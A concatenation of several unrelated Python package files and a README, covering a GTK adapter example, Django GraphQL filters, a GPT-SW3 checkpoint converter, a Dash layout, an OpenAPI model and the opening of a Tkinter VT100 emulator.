# the maximum value that the internal variable can be set at.
#
# The controller declares an adapter that adapts a text entry and
# the user-class instance. As the user class raises a ValueError
# exception when trying setting a bad value, the adapter is
# requested to handle error conditions through value_error
# parameter. Try to set a value greater than 10 by editing the text
# entry.
class UserClass (Observable):
    """Observable holder of a bounded integer value.

    The value stored via set_x() may never exceed the max_val given at
    construction time; violations raise ValueError.
    """
    def __init__(self, max_val):
        Observable.__init__(self)
        self.__x = 0
        self.max_val = max_val

    @Observable.observed
    def set_x(self, v):
        # Guard clause: reject values above the configured ceiling.
        if v > self.max_val:
            raise ValueError("x cannot be greater than %d" % self.max_val)
        self.__x = v

    def get_x(self):
        return self.__x
class MyView (View):
    """View that loads the 'window2' top-level widget from adapters.glade."""
    glade = "adapters.glade"  # glade resource file
    top = "window2"  # name of the top-level widget to show
    pass
class MyModel (Model):
    """Model exposing a UserClass instance as observable property 'xx'."""
    xx = UserClass(10)  # internal value capped at 10
    __observables__ = ("xx",)
    pass
class MyCtrl (Controller):
    """Controller wiring the text entry 'en2' to model.xx via a UserClassAdapter."""
    def register_adapters(self):
        # Adapt model.xx through its getter/setter pair; bad values are
        # routed to the myerr error handler.
        adapter = UserClassAdapter(self.model, "xx", "get_x", "set_x",
                                   value_error=myerr)
        adapter.connect_widget(self.view["en2"])
        self.adapt(adapter)

    def on_button2_clicked(self, button):
        # Increment the model value; may trigger the value_error handler.
        self.model.xx.set_x(self.model.xx.get_x() + 1)

    def on_window2_delete_event(self, w, e):
        gtk.main_quit()
        return True
# ----------------------------------------------------------------------
def myerr(adapt, name, val):
    # Error callback for the adapter: report the rejected value, then restore
    # the widget to the model's current value.  (Python 2 print statement.)
    print "Error from", adapt, ":", name, ",", val
    adapt.update_widget()
    return
# Wire up the MVC triad and start the GTK main loop.
m = MyModel()
v = MyView()
c = MyCtrl(m, v)
m.xx.set_x(5)  # initial value shown in the entry
gtk.main()
|
PypiClean
|
/python-djangogql-0.1.0.tar.gz/python-djangogql-0.1.0/djangogql/core/types/filter_input.py
|
import itertools
import graphene
from django.db import models
from django_filters.filterset import FILTER_FOR_DBFIELD_DEFAULTS, BaseFilterSet
from graphene import Argument, InputField, InputObjectType, String
from graphene.types.inputobjecttype import InputObjectTypeOptions
from graphene.types.utils import yank_fields_from_attrs
from ..filters import GlobalIDFilter, GlobalIDMultipleChoiceFilter
from .common import NonNullList
from .converter import convert_field
# Map primary-key and relation model fields to GlobalID-aware filters so that
# relay-style global IDs can be used directly in filter arguments.
GLOBAL_ID_FILTERS = {
    models.AutoField: {"filter_class": GlobalIDFilter},
    models.OneToOneField: {"filter_class": GlobalIDFilter},
    models.ForeignKey: {"filter_class": GlobalIDFilter},
    models.ManyToManyField: {"filter_class": GlobalIDMultipleChoiceFilter},
    models.ManyToOneRel: {"filter_class": GlobalIDMultipleChoiceFilter},
    models.ManyToManyRel: {"filter_class": GlobalIDMultipleChoiceFilter},
}
class GraphQLFilterSetMixin(BaseFilterSet):
    """FilterSet mixin whose per-field defaults also understand relay global IDs."""
    # django-filter defaults, overlaid with the GlobalID-aware entries.
    FILTER_DEFAULTS = dict(
        itertools.chain(FILTER_FOR_DBFIELD_DEFAULTS.items(), GLOBAL_ID_FILTERS.items())
    )
def get_filterset_class(filterset_class=None):
    """Return a subclass of *filterset_class* mixed with GraphQLFilterSetMixin.

    NOTE(review): the default of None is unusable — accessing ``__name__`` on
    it raises AttributeError; callers are expected to always pass a class.
    """
    name = "GraphQL{}".format(filterset_class.__name__)
    return type(name, (filterset_class, GraphQLFilterSetMixin), {})
class FilterInputObjectType(InputObjectType):
    """Graphene input type whose fields are generated from a django-filter FilterSet.

    Subclasses pass ``filterset_class`` via Meta; each filter declared on that
    class is converted into a matching graphene input field.
    """
    @classmethod
    def __init_subclass_with_meta__(
        cls, _meta=None, model=None, filterset_class=None, fields=None, **options
    ):
        cls.custom_filterset_class = filterset_class
        cls.filterset_class = None
        cls.fields = fields
        cls.model = model
        if not _meta:
            _meta = InputObjectTypeOptions(cls)
        # Derive graphene input fields from the filterset's declared filters.
        fields = cls.get_filtering_args_from_filterset()
        fields = yank_fields_from_attrs(fields, _as=InputField)
        if _meta.fields:
            _meta.fields.update(fields)
        else:
            _meta.fields = fields
        super().__init_subclass_with_meta__(_meta=_meta, **options)
    @classmethod
    def get_filtering_args_from_filterset(cls):
        """Map each filter on the filterset to a graphene input field type."""
        if not cls.custom_filterset_class:
            raise ValueError("Provide filterset class")
        cls.filterset_class = get_filterset_class(cls.custom_filterset_class)
        args = {}
        for name, filter_field in cls.filterset_class.base_filters.items():
            # Filters that declare their own input_class are converted
            # directly; otherwise the underlying form field is converted.
            input_class = getattr(filter_field, "input_class", None)
            if input_class:
                field_type = convert_field(filter_field)
            else:
                field_type = convert_field(filter_field.field)
            field_type.description = getattr(filter_field, "help_text", "")
            kwargs = getattr(field_type, "kwargs", {})
            field_type.kwargs = kwargs
            args[name] = field_type
        return args
class StringFilterInput(graphene.InputObjectType):
    """String filter input: exact match (``eq``) or membership (``one_of``)."""
    eq = graphene.String(required=False)
    one_of = NonNullList(graphene.String, required=False)
|
PypiClean
|
/llm_toys-0.1.1-py3-none-any.whl/llm_toys/hf/transformers/models/gpt_sw3/convert_megatron_to_pytorch.py
|
""" Convert GPT-SW3 megatron checkpoints to pytorch"""
import argparse
import os
from os.path import isfile
import torch
from transformers import GPT2Config
def recursive_print(name, val, spaces=0):
    """Pretty-print a (possibly nested) checkpoint dict.

    Dict keys are printed indented by dots; tensor leaves show their size,
    other leaves show their value.  *name* of None suppresses the label.
    """
    if name is None:
        msg = None
    else:
        template = "." * max(0, spaces - 2) + "# {:" + str(50 - spaces) + "s}"
        msg = template.format(name)
    if isinstance(val, dict):
        if msg is not None:
            print(msg)
        for key in val:
            recursive_print(key, val[key], spaces + 2)
    elif isinstance(val, torch.Tensor):
        print(msg, ":", val.size())
    else:
        print(msg, ":", val)
def fix_query_key_value_ordering(param, num_splits, num_heads, hidden_size):
    """Permute a fused QKV tensor to [num_splits * num_heads * hidden_size, :].

    Megatron stores the leading dimension as [num_heads, num_splits,
    hidden_size]; later NVIDIA Megatron-LM versions (and HuggingFace GPT2,
    after one more transpose for weights) expect [num_splits, num_heads,
    hidden_size].  See
    https://github.com/NVIDIA/Megatron-LM/blob/v2.4/megatron/checkpointing.py#L209
    for the inverse operation.
    """
    original_shape = param.size()
    grouped = param.view(num_heads, num_splits, hidden_size, *original_shape[1:])
    return grouped.transpose(0, 1).contiguous().view(*original_shape)
def convert_megatron_checkpoint(sd_megatron, config):
    """
    Converts a Megatron checkpoint to a HuggingFace GPT-SW3 checkpoint.

    :param sd_megatron: Megatron state dict (model.language_model.* keys).
    :param config: GPT2Config carrying n_positions/n_layer/vocab_size/n_head/n_embd.
    :return: HuggingFace-style state dict (transformer.* / lm_head keys).
    """
    n_positions = config.n_positions
    layers = config.n_layer
    vocab_size = config.vocab_size
    heads = config.n_head
    hidden_size_per_head = config.n_embd // config.n_head
    # Word embeddings may be padded in Megatron; truncate to the real vocab.
    word_embeddings = sd_megatron["model.language_model.embedding.word_embeddings.weight"][:vocab_size, :]
    sd_hf = {
        "transformer.wte.weight": word_embeddings,
        "transformer.wpe.weight": sd_megatron["model.language_model.embedding.position_embeddings.weight"],
        "transformer.ln_f.weight": sd_megatron["model.language_model.encoder.final_layernorm.weight"],
        "transformer.ln_f.bias": sd_megatron["model.language_model.encoder.final_layernorm.bias"],
    }
    pf = "model.language_model.encoder.layers."
    for i in range(layers):
        # Lower-triangular causal attention mask expected by HF GPT2.
        # NOTE(review): loop-invariant; could be built once outside the loop.
        causal_mask = torch.tril(torch.ones((n_positions, n_positions), dtype=torch.bool))
        causal_mask = causal_mask.view(1, 1, n_positions, n_positions)
        sd_hf[f"transformer.h.{i}.attn.bias"] = causal_mask
        sd_hf[f"transformer.h.{i}.attn.masked_bias"] = torch.tensor(-1e4, dtype=torch.bfloat16)
        sd_hf[f"transformer.h.{i}.ln_1.weight"] = sd_megatron[f"{pf}{i}.input_layernorm.weight"]
        sd_hf[f"transformer.h.{i}.ln_1.bias"] = sd_megatron[f"{pf}{i}.input_layernorm.bias"]
        # Fused QKV: reorder head/split layout, then transpose weights for HF GPT2.
        val1 = sd_megatron[f"{pf}{i}.self_attention.query_key_value.weight"]
        val1 = fix_query_key_value_ordering(val1, 3, heads, hidden_size_per_head)
        sd_hf[f"transformer.h.{i}.attn.c_attn.weight"] = val1.transpose(0, 1).contiguous()
        val2 = sd_megatron[f"{pf}{i}.self_attention.query_key_value.bias"]
        val2 = fix_query_key_value_ordering(val2, 3, heads, hidden_size_per_head)
        sd_hf[f"transformer.h.{i}.attn.c_attn.bias"] = val2
        sd_hf[f"transformer.h.{i}.attn.c_proj.weight"] = sd_megatron[f"{pf}{i}.self_attention.dense.weight"].transpose(
            0, 1
        )
        sd_hf[f"transformer.h.{i}.attn.c_proj.bias"] = sd_megatron[f"{pf}{i}.self_attention.dense.bias"]
        sd_hf[f"transformer.h.{i}.ln_2.weight"] = sd_megatron[f"{pf}{i}.post_attention_layernorm.weight"]
        sd_hf[f"transformer.h.{i}.ln_2.bias"] = sd_megatron[f"{pf}{i}.post_attention_layernorm.bias"]
        sd_hf[f"transformer.h.{i}.mlp.c_fc.weight"] = sd_megatron[f"{pf}{i}.mlp.dense_h_to_4h.weight"].transpose(0, 1)
        sd_hf[f"transformer.h.{i}.mlp.c_fc.bias"] = sd_megatron[f"{pf}{i}.mlp.dense_h_to_4h.bias"]
        sd_hf[f"transformer.h.{i}.mlp.c_proj.weight"] = sd_megatron[f"{pf}{i}.mlp.dense_4h_to_h.weight"].transpose(
            0, 1
        )
        sd_hf[f"transformer.h.{i}.mlp.c_proj.bias"] = sd_megatron[f"{pf}{i}.mlp.dense_4h_to_h.bias"]
    # For LM head, transformers' wants the matrix to weight embeddings.
    sd_hf["lm_head.weight"] = word_embeddings
    return sd_hf
def copy_config(config_hf, config_megatron):
    """Populate a HuggingFace GPT2Config from a Megatron config dict.

    :param config_hf: GPT2Config to mutate.
    :param config_megatron: Megatron hyper-parameter dict.
    :return: the same (mutated) config_hf.
    """
    # Fields copied straight across from the Megatron config.
    copied = {
        "n_positions": "encoder_seq_length",
        "n_embd": "hidden_size",
        "n_layer": "num_layers",
        "n_head": "num_attention_heads",
        "n_inner": "ffn_hidden_size",
        "layer_norm_epsilon": "layernorm_epsilon",  # 1e-5
        "initializer_range": "init_method_std",  # 0.02
        "apply_query_key_layer_scaling": "apply_query_key_layer_scaling",  # True
    }
    for hf_attr, megatron_key in copied.items():
        setattr(config_hf, hf_attr, config_megatron[megatron_key])
    # Fixed values shared by all GPT-SW3 checkpoints.
    config_hf.vocab_size = 64000
    config_hf.activation_function = "gelu"
    config_hf.resid_pdrop = 0.1
    config_hf.embd_pdrop = 0.1
    config_hf.attn_pdrop = 0.1
    config_hf.normalize_attention_scores = True
    config_hf.use_cache = True
    # This identifies the 6.7B (7B) model which uses a different tokenizer
    if config_megatron["hidden_size"] == 4096:
        config_hf.bos_token_id = 1  # <|endoftext|>
        config_hf.eos_token_id = 1  # <|endoftext|>
        config_hf.pad_token_id = 0  # <unk>
    else:
        config_hf.bos_token_id = 2  # <s>
        config_hf.eos_token_id = 3  # <|endoftext|>
        config_hf.pad_token_id = 0  # <pad>
    return config_hf
def main(args):
    """Convert a GPT-SW3 Megatron checkpoint to HuggingFace format on disk.

    :param args: argparse namespace with checkpoint_path, save_path and
        print_checkpoint_structure.
    :raises FileNotFoundError: if checkpoint_path does not exist.
    """
    print(args)
    checkpoint_path = args.checkpoint_path
    save_path = args.save_path
    # BUGFIX: the existence check was inverted — it raised FileNotFoundError
    # exactly when the checkpoint file DID exist, and proceeded when it didn't.
    if not isfile(checkpoint_path):
        raise FileNotFoundError(f"ERROR! could not find file {checkpoint_path}")
    # Load the model.
    checkpoint = torch.load(checkpoint_path, map_location="cpu")
    # Load the config.
    config_megatron = checkpoint["hyper_parameters"]["cfg"]
    config_hf = GPT2Config()
    config_hf = copy_config(config_hf=config_hf, config_megatron=config_megatron)
    config_hf.architectures = ["GPT2LMHeadModel"]
    sd_megatron = checkpoint["state_dict"]
    # Convert.
    print("Converting")
    sd_hf = convert_megatron_checkpoint(sd_megatron, config_hf)
    # Print the structure of converted state dict.
    if args.print_checkpoint_structure:
        recursive_print(None, sd_hf)
    config_hf.tokenizer_class = "GPTSw3Tokenizer"
    # Store the config to file.
    print("Saving config")
    config_hf.save_pretrained(save_path)
    # Store the state_dict to file.
    output_checkpoint_file = os.path.join(save_path, "pytorch_model.bin")
    print(f'Saving checkpoint to "{output_checkpoint_file}"')
    torch.save(sd_hf, output_checkpoint_file)
if __name__ == "__main__":
    # CLI entry point: --checkpoint_path and --save_path are required;
    # --print-checkpoint-structure dumps the converted state-dict layout.
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--checkpoint_path",
        type=str,
        required=True,
        help="e.g. megatron_gpt--val_loss=2.42-step=38000-consumed_samples=54720000",
    )
    parser.add_argument("--save_path", type=str, required=True, help="e.g. /home/user/gpt-sw3/hf")
    parser.add_argument("--print-checkpoint-structure", action="store_true")
    _args = parser.parse_args()
    main(_args)
|
PypiClean
|
/Heimdallr-0.2.7-py36-none-any.whl/heimdallr/server/board_layout/body.py
|
__author__ = "Christian Heider Nielsen"
__doc__ = r"""
Created on 15/03/2020
"""
from typing import List
from dash import dcc, html
from heimdallr.configuration.heimdallr_config import (
CALENDAR_ID,
CALENDAR_INTERVAL_ID,
CALENDAR_INTERVAL_MS,
DU_INTERVAL_ID,
DU_INTERVAL_MS,
DU_TABLES_ID,
GPU_GRAPHS_ID,
GPU_INTERVAL_ID,
GPU_INTERVAL_MS,
GPU_TABLES_ID,
TEAMS_STATUS_ID,
TEAMS_STATUS_INTERVAL_ID,
TEAMS_STATUS_INTERVAL_MS,
)
__all__ = ["get_body"]
def get_body() -> List[html.Div]:
    """Build the dashboard body layout.

    Top row: calendar, GPU graphs, GPU tables and disk-usage tables; second
    row: Teams status.  Each panel is paired with a dcc.Interval that drives
    its periodic refresh callback.
    """
    return [
        html.Div(
            [
                html.Div(
                    [
                        html.Div([], id=CALENDAR_ID),
                        dcc.Interval(
                            id=CALENDAR_INTERVAL_ID,
                            interval=CALENDAR_INTERVAL_MS,
                            n_intervals=0,
                        ),
                    ],
                    className="col p-2",
                ),
                html.Div([html.Div([], id=GPU_GRAPHS_ID)], className="col"),
                html.Div(
                    [
                        html.Div([], id=GPU_TABLES_ID),
                    ],
                    className="col p-2",
                ),
                # Single interval shared by the GPU graphs and tables.
                dcc.Interval(
                    id=GPU_INTERVAL_ID, interval=GPU_INTERVAL_MS, n_intervals=0
                ),
                html.Div(  # Disk Usage
                    [
                        html.Div([], id=DU_TABLES_ID),
                        dcc.Interval(
                            id=DU_INTERVAL_ID, interval=DU_INTERVAL_MS, n_intervals=0
                        ),
                    ],
                    className="col p-2",
                ),
            ],
            className="row p-2",
        ),
        html.Div(  # Teams Status
            [
                html.Div([], id=TEAMS_STATUS_ID, className="col"),
                dcc.Interval(
                    id=TEAMS_STATUS_INTERVAL_ID,
                    interval=TEAMS_STATUS_INTERVAL_MS,
                    n_intervals=0,
                ),
            ],
            className="row p-1",
        ),
    ]
|
PypiClean
|
/lizard-map-5.5.tar.gz/lizard-map-5.5/README.rst
|
lizard-map
==========
Lizard-map provides basic map interaction for `Django
<http://www.djangoproject.com>`_ applications that use a `lizard-ui
<http://pypi.python.org/pypi/lizard-ui>`_ user interface. We designed it at
`Nelen & Schuurmans <http://www.nelen-schuurmans.nl>`_ for our geographical
information websites (with water management information).
It provides:
- Openlayers (map javascript library) map display and server-side map
  generation (mapnik's WMS functionality). Background maps are configurable.
- A "workspace" interaction model: drag mappable items into a workspace and
they'll get displayed. The workspace is stored in the Django database.
- A "collage" attached to every workspace for storing selected info on map
items (like graphs).
- An extension mechanism to plug more or less arbitrary map sources into the
  workspace so that they can be displayed, searched, etc.
.. image:: https://secure.travis-ci.org/lizardsystem/lizard-map.png?branch=master
:target: http://travis-ci.org/#!/lizardsystem/lizard-map
Translation status:
.. image:: https://translations.lizard.net/projects/p/lizardsystem/resource/lizard-map/chart/image_png
:target: https://translations.lizard.net/projects/p/lizardsystem/resource/lizard-map/
Core concept: workspaces
------------------------
A *workspace item* is something that can be displayed on a map. A *workspace*
is a collection of workspace items that is actually displayed.
There are two types of workspaces:
- Edit Workspace: Every session/user gets its own workspace. This
workspace can be edited.
- Storage Workspace. TODO: extra info.
A workspace item needs to know how to display itself, how to search for items
when you click on the map and more. To get that to work for arbitrary map
sources, you need to configure an adapter. The adapter has a ``layer()``
method for returning a mapnik layer, a ``search()`` method for searching and
so on.
- You register an adapter as a so-called "setuptools entrypoint" under a
  specific name.
- When you add a workspace item, you pass in the adapter name and an optional
snippet of json to configure the adapter.
The workspace item keeps track of this adapter and its configuration and uses
it to generate maps, for searching, etc.
Collages
--------
A workspace item often results in multiple areas or points. If you click on
such a point, you normally get a popup with extra information. If you want to
compare a couple of those information "snippets", you can place them in your
*collage*. In the GUI this is called "Selectie".
Clicking the collage gives a popup with all the collected information popups
in that single popup.
Interaction
-----------
Included is quite some javascript for workspace interaction. Potential
workspace items can be drag/dropped into a workspace to add them. Workspace
items can be reordered. You can drag them to the trash.
Dependencies
------------
Almost all dependencies are listed in our ``setup.py``, so they get pulled in
automatically. Not all of them install as good as eggs, though. You might be
better off installing them system-wide with your OS's own packaging system.
You can force buildout to use system-wide installed packages with the
`osc.recipe.sysegg <http://pypi.python.org/pypi/osc.recipe.sysegg>`_ recipe.
An example config::
[buildout]
...
parts =
sysegg
...
[sysegg]
recipe = osc.recipe.sysegg
force-sysegg = true
eggs =
PIL
matplotlib
simplejson
pyproj
Development installation
------------------------
The first time, you'll have to run the "bootstrap" script to set up setuptools
and buildout::
$> python bootstrap.py
And then run buildout to set everything up::
$> bin/buildout
(On windows it is called ``bin\buildout.exe``).
You'll have to re-run buildout when you or someone else made a change in
``setup.py`` or ``buildout.cfg``.
The current package is installed as a "development package", so
changes in .py files are automatically available (just like with ``python
setup.py develop``).
If you want to use trunk checkouts of other packages (instead of released
versions), add them as an "svn external" in the ``local_checkouts/`` directory
and add them to the ``develop =`` list in buildout.cfg.
Tests can always be run with ``bin/test`` or ``bin\test.exe``.
External dependencies
---------------------
The dependencies for a full website that uses lizard-map are best expressed as
ubuntu/debian package dependencies: build-essential, python2.6-dev, apache2,
libjpeg-dev, python-imaging, python-matplotlib, python-mapnik, python-scipy,
libapache2-mod-wsgi, python-gdal, spatialite-bin, python-pysqlite2,
python-pyproj.
Upgrading to Lizard 3
---------------------
Short summary to convert your app to Lizard 3.
- Replace old template tags workspace with workspace_edit and
collage_edit (see below).
- Review urls.py for old lizard_map views. Replace with new ones or
remove.
- Migrate
- Upgrade to class-based views, using one of the View classes
(i.e. AppView). An excellent description can be found when googling
"class based views reinout". You can take lizard-map views as
examples as well.
Site integration
----------------
The following steps has to be done in order to use the
lizard_map/workspace concepts.
- Install lizard-map somewhere. (Add 'lizard-map' in your setup.py:
install_requires)
- Add 'lizard_map' to your settings.py: INSTALLED_APPS.
- Add an entry in your urls.py::
import lizard_map.urls
(r'^map/', include(lizard_map.urls)),
- Use one of the views, i.e. AppView.
Example view::
from lizard_map.views import AppView
class MyAppView(AppView):
template_name = 'my_app/template.html'
Example template::
{% extends "lizard_map/wms.html" %}
{% load workspaces %}
{% block subtitle %} (page name) {% endblock %}
{% block sidebar %}
<div id="iconbox" class="sidebarbox sidebarbox-stretched iconlist">
<h2>Apps</h2>
<ul>
<li>
<a href="/address/" class="lizard-map-link">
<img src="{{ STATIC_URL }}lizard_ui/app_icons/meetgegevens.png" />
<div>App</div>
</a>
</li>
</ul>
</div>
{% workspace_edit view.workspace_edit %}
{% collage_edit view.collage_edit %}
{% endblock %}
- Add this view to your url.py:
import my_app.views
(r'^$', my_app.views.MyAppView.as_view()),
- Start testing by running syncdb / migrate.
- Add and configure background maps by loading "background_maps" fixture.
- Start dev server.
Settings
--------
Some default date range settings can be set in settings.py. All
settings are optional::
START_YEAR = 2000 # Defaults to today - 7 years
END_YEAR = 2010 # Defaults to today + 3 years.
# Define default period 1..5
# From daterange.py:
# PERIOD_DAY = 1
# PERIOD_TWO_DAYS = 2
# PERIOD_WEEK = 3
# PERIOD_MONTH = 4
# PERIOD_YEAR = 5
# PERIOD_OTHER = 6
DEFAULT_PERIOD = 5 # Defaults to 1
# If DEFAULT_PERIOD = 6, define these
DEFAULT_START_DAYS = -20 # Defaults to -1000
DEFAULT_END_DAYS = 1 # Defaults to 10
You can add google analytics to your site by adding the tracking
code::
GOOGLE_TRACKING_CODE = 'AA-12345678-0'
|
PypiClean
|
/gewv-sides-client-1.0.2.tar.gz/gewv-sides-client-1.0.2/gewv_sides_client/model/array_of_boxes.py
|
import re # noqa: F401
import sys # noqa: F401
from gewv_sides_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from gewv_sides_client.exceptions import ApiAttributeError
def lazy_import():
    """Resolve the ``Box`` model lazily (avoids import cycles at load time)."""
    from gewv_sides_client.model.box import Box as _Box
    globals().update(Box=_Box)
class ArrayOfBoxes(ModelSimple):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech
    Do not edit the class manually.
    Attributes:
      allowed_values (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          with a capitalized key describing the allowed value and an allowed
          value. These dicts store the allowed enum values.
      validations (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          that stores validations for max_length, min_length, max_items,
          min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
          inclusive_minimum, and regex.
      additional_properties_type (tuple): A tuple of classes accepted
          as additional properties values.
    """

    # No enum restrictions or validation rules are defined for this model.
    allowed_values = {
    }

    validations = {
    }

    @cached_property
    def additional_properties_type():
        """
        This must be a method because a model may have properties that are
        of type self, this must run after the class is loaded
        """
        lazy_import()
        return (bool, date, datetime, dict, float, int, list, str, none_type,)  # noqa: E501

    # Generated flag: None is not an accepted model value.
    _nullable = False

    @cached_property
    def openapi_types():
        """
        This must be a method because a model may have properties that are
        of type self, this must run after the class is loaded
        Returns
            openapi_types (dict): The key is attribute name
                and the value is attribute type.
        """
        lazy_import()
        # The single wrapped value is a list of Box instances.
        return {
            'value': ([Box],),
        }

    @cached_property
    def discriminator():
        # Simple (single-value) models have no discriminator-based polymorphism.
        return None

    # No renaming between python attribute names and spec property names.
    attribute_map = {}

    # No properties are marked readOnly in the spec.
    read_only_vars = set()

    # Only populated for allOf/oneOf/anyOf composed schemas; not this model.
    _composed_schemas = None

    # Bookkeeping attributes that every instance must carry.
    required_properties = set([
        '_data_store',
        '_check_type',
        '_spec_property_naming',
        '_path_to_item',
        '_configuration',
        '_visited_composed_classes',
    ])

    @convert_js_args_to_python_args
    def __init__(self, *args, **kwargs):
        """ArrayOfBoxes - a model defined in OpenAPI
        Note that value can be passed either in args or in kwargs, but not in both.
        Args:
            args[0] ([Box]):  # noqa: E501
        Keyword Args:
            value ([Box]):  # noqa: E501
            _check_type (bool): if True, values for parameters in openapi_types
                                will be type checked and a TypeError will be
                                raised if the wrong type is input.
                                Defaults to True
            _path_to_item (tuple/list): This is a list of keys or values to
                                drill down to the model in received_data
                                when deserializing a response
            _spec_property_naming (bool): True if the variable names in the input data
                                are serialized names, as specified in the OpenAPI document.
                                False if the variable names in the input data
                                are pythonic names, e.g. snake case (default)
            _configuration (Configuration): the instance to use when
                                deserializing a file_type parameter.
                                If passed, type conversion is attempted
                                If omitted no type conversion is done.
            _visited_composed_classes (tuple): This stores a tuple of
                                classes that we have traveled through so that
                                if we see that class again we will not use its
                                discriminator again.
                                When traveling through a discriminator, the
                                composed schema that is
                                is traveled through is added to this set.
                                For example if Animal has a discriminator
                                petType and we pass in "Dog", and the class Dog
                                allOf includes Animal, we move through Animal
                                once using the discriminator, and pick Dog.
                                Then in Dog, we will make an instance of the
                                Animal class but this time we won't travel
                                through its discriminator because we passed in
                                _visited_composed_classes = (Animal,)
        """
        # required up here when default value is not given
        _path_to_item = kwargs.pop('_path_to_item', ())

        # 'value' may be given positionally or as a keyword, never both.
        if 'value' in kwargs:
            value = kwargs.pop('value')
        elif args:
            args = list(args)
            value = args.pop(0)
        else:
            raise ApiTypeError(
                "value is required, but not passed in args or kwargs and doesn't have default",
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )

        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())

        # Any positional argument remaining after 'value' is an error.
        if args:
            raise ApiTypeError(
                "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
                    args,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )

        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
        # Store the wrapped value (attribute handling comes from ModelSimple).
        self.value = value
        # Any keyword argument remaining after the known ones is an error.
        if kwargs:
            raise ApiTypeError(
                "Invalid named arguments=%s passed to %s. Remove those invalid named arguments." % (
                    kwargs,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )

    @classmethod
    @convert_js_args_to_python_args
    def _from_openapi_data(cls, *args, **kwargs):
        """ArrayOfBoxes - a model defined in OpenAPI
        Note that value can be passed either in args or in kwargs, but not in both.
        Args:
            args[0] ([Box]):  # noqa: E501
        Keyword Args:
            value ([Box]):  # noqa: E501
            _check_type (bool): if True, values for parameters in openapi_types
                                will be type checked and a TypeError will be
                                raised if the wrong type is input.
                                Defaults to True
            _path_to_item (tuple/list): This is a list of keys or values to
                                drill down to the model in received_data
                                when deserializing a response
            _spec_property_naming (bool): True if the variable names in the input data
                                are serialized names, as specified in the OpenAPI document.
                                False if the variable names in the input data
                                are pythonic names, e.g. snake case (default)
            _configuration (Configuration): the instance to use when
                                deserializing a file_type parameter.
                                If passed, type conversion is attempted
                                If omitted no type conversion is done.
            _visited_composed_classes (tuple): This stores a tuple of
                                classes that we have traveled through so that
                                if we see that class again we will not use its
                                discriminator again.
                                When traveling through a discriminator, the
                                composed schema that is
                                is traveled through is added to this set.
                                For example if Animal has a discriminator
                                petType and we pass in "Dog", and the class Dog
                                allOf includes Animal, we move through Animal
                                once using the discriminator, and pick Dog.
                                Then in Dog, we will make an instance of the
                                Animal class but this time we won't travel
                                through its discriminator because we passed in
                                _visited_composed_classes = (Animal,)
        """
        # required up here when default value is not given
        _path_to_item = kwargs.pop('_path_to_item', ())
        # Create the instance without invoking __init__; attributes are set below.
        self = super(OpenApiModel, cls).__new__(cls)

        # Same argument handling as __init__ (generated duplication).
        if 'value' in kwargs:
            value = kwargs.pop('value')
        elif args:
            args = list(args)
            value = args.pop(0)
        else:
            raise ApiTypeError(
                "value is required, but not passed in args or kwargs and doesn't have default",
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )

        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())

        if args:
            raise ApiTypeError(
                "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
                    args,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )

        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
        self.value = value
        if kwargs:
            raise ApiTypeError(
                "Invalid named arguments=%s passed to %s. Remove those invalid named arguments." % (
                    kwargs,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )
        return self
|
PypiClean
|
/zope.app.twisted-3.5.0.tar.gz/zope.app.twisted-3.5.0/src/twisted/conch/ui/tkvt100.py
|
#
"""Module to emulate a VT100 terminal in Tkinter.
Maintainer: U{Paul Swartz <mailto:[email protected]>}
"""
import Tkinter, tkFont
import ansi
import string
# Font metrics are filled in lazily by VT100Frame.__init__ — presumably because
# a Tk root must exist before tkFont can be used (TODO confirm). The intended
# initializers are kept in the trailing comments.
ttyFont = None#tkFont.Font(family = 'Courier', size = 10)
fontWidth, fontHeight = None,None#max(map(ttyFont.measure, string.letters+string.digits)), int(ttyFont.metrics()['linespace'])

# One-letter color keys: lowercase are the normal colors, uppercase the bright
# variants (see the hex values in colorMap below).
colorKeys = (
    'b', 'r', 'g', 'y', 'l', 'm', 'c', 'w',
    'B', 'R', 'G', 'Y', 'L', 'M', 'C', 'W'
)

# Color key -> Tk hex color used when drawing characters and backgrounds.
colorMap = {
    'b': '#000000', 'r': '#c40000', 'g': '#00c400', 'y': '#c4c400',
    'l': '#000080', 'm': '#c400c4', 'c': '#00c4c4', 'w': '#c4c4c4',
    'B': '#626262', 'R': '#ff0000', 'G': '#00ff00', 'Y': '#ffff00',
    'L': '#0000ff', 'M': '#ff00ff', 'C': '#00ffff', 'W': '#ffffff',
}
class VT100Frame(Tkinter.Frame):
    """A Tkinter frame that renders a VT100-style character grid on a Canvas.

    Keystrokes are forwarded to ``callback``; incoming terminal data is fed
